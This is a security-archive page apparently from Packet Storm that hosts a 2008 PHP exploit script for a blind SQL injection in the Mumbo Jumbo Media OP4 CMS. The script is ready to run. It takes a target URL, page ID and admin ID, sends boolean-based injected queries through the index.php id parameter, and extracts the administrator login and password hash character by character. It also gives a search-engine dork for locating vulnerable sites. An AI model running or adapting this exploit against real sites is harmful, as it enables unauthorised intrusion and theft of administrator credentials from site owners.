what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

mumbojumbo-sql.txt

mumbojumbo-sql.txt
Posted Apr 14, 2008
Authored by Lidloses_Auge

Mumbo Jumbo Media OP4 remote blind SQL injection exploit.

tags | exploit, remote, sql injection
SHA-256 | dcd7c431d30cffe30f76ff235d454ba81bd2e34e07404541462c10e7beea1a4a

mumbojumbo-sql.txt

Change Mirror Download
<?php
ini_set("max_execution_time",0);
print_r('
###############################################################
#
# Mumbo Jumbo Media - OP4 - Blind SQL Injection Exploit
#
# Vulnerability discovered by: Lidloses_Auge
# Exploit coded by: Lidloses_Auge
# Greetz to: Free-Hack, GPM
# Date: 13.04.2008
#
###############################################################
#
# Dork: "mumbo jumbo media" + inurl:"index.php"
# Usage: php '.$argv[0].' [Target] [Page ID] [Admin ID]
# Example for "http://www.site.com/cms/index.php?id=300"
# => php '.$argv[0].' http://www.site.com/cms/ 300 1
#
###############################################################
');
if ($argc > 1) {
print_r('
');
echo 'Searching for Admin: ';
for($i=1; $i <= 50; $i++) {
$temp1 = file_get_contents($argv[1].'index.php?id='.$argv[2].'+and+length((select+kennung+from+op4_admin+where+id='.$argv[3].'))='.$i.'--');
if (strpos($temp1,'Die angeforderte Seite existiert nicht') == 0) {
$adlen = $i;
$i = 50;
}
}
for($i=1; $i <= $adlen; $i++) {
for($zahl=48; $zahl <= 122; $zahl++) {
$temp = file_get_contents($argv[1].'index.php?id='.$argv[2].'+and+ascii(substring((select+kennung+from+op4_admin+where+id='.$argv[3].'),'.$i.',1))='.$zahl.'--');
if (strpos($temp,'Die angeforderte Seite existiert nicht') == 0) {
echo chr($zahl);
$zahl = 122;
}
if ($zahl == 57) {
$zahl = 96;
}
}
}
print_r('
');
echo 'Searching for Hash: ';
for($i=1; $i <= 32; $i++) {
for($zahl=48; $zahl <= 102; $zahl++) {
if ($check = 0) {
$temp2 = file_get_contents($argv[1].'index.php?id='.$argv[2].'+and+ascii(substring((select+passwort+from+op4_admin+where+id='.$argv[3].'),'.$i.',1))<97--');
if (strpos($temp2,'Die angeforderte Seite existiert nicht') == 0) {
$zahl = 97;
$check = 1;
}
}
$temp = file_get_contents($argv[1].'index.php?id='.$argv[2].'+and+ascii(substring((select+passwort+from+op4_admin+where+id='.$argv[3].'),'.$i.',1))='.$zahl.'--');
if (strpos($temp,'Die angeforderte Seite existiert nicht') == 0) {
echo chr($zahl);
$zahl = 102;
}
if ($zahl == 57) {
$zahl = 97;
}
}
$check = 0;
}
}
?>
Login or Register to add favorites

File Archive:

August 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Aug 1st
    15 Files
  • 2
    Aug 2nd
    22 Files
  • 3
    Aug 3rd
    0 Files
  • 4
    Aug 4th
    0 Files
  • 5
    Aug 5th
    15 Files
  • 6
    Aug 6th
    11 Files
  • 7
    Aug 7th
    43 Files
  • 8
    Aug 8th
    42 Files
  • 9
    Aug 9th
    36 Files
  • 10
    Aug 10th
    0 Files
  • 11
    Aug 11th
    0 Files
  • 12
    Aug 12th
    27 Files
  • 13
    Aug 13th
    18 Files
  • 14
    Aug 14th
    0 Files
  • 15
    Aug 15th
    0 Files
  • 16
    Aug 16th
    0 Files
  • 17
    Aug 17th
    0 Files
  • 18
    Aug 18th
    0 Files
  • 19
    Aug 19th
    0 Files
  • 20
    Aug 20th
    0 Files
  • 21
    Aug 21st
    0 Files
  • 22
    Aug 22nd
    0 Files
  • 23
    Aug 23rd
    0 Files
  • 24
    Aug 24th
    0 Files
  • 25
    Aug 25th
    0 Files
  • 26
    Aug 26th
    0 Files
  • 27
    Aug 27th
    0 Files
  • 28
    Aug 28th
    0 Files
  • 29
    Aug 29th
    0 Files
  • 30
    Aug 30th
    0 Files
  • 31
    Aug 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close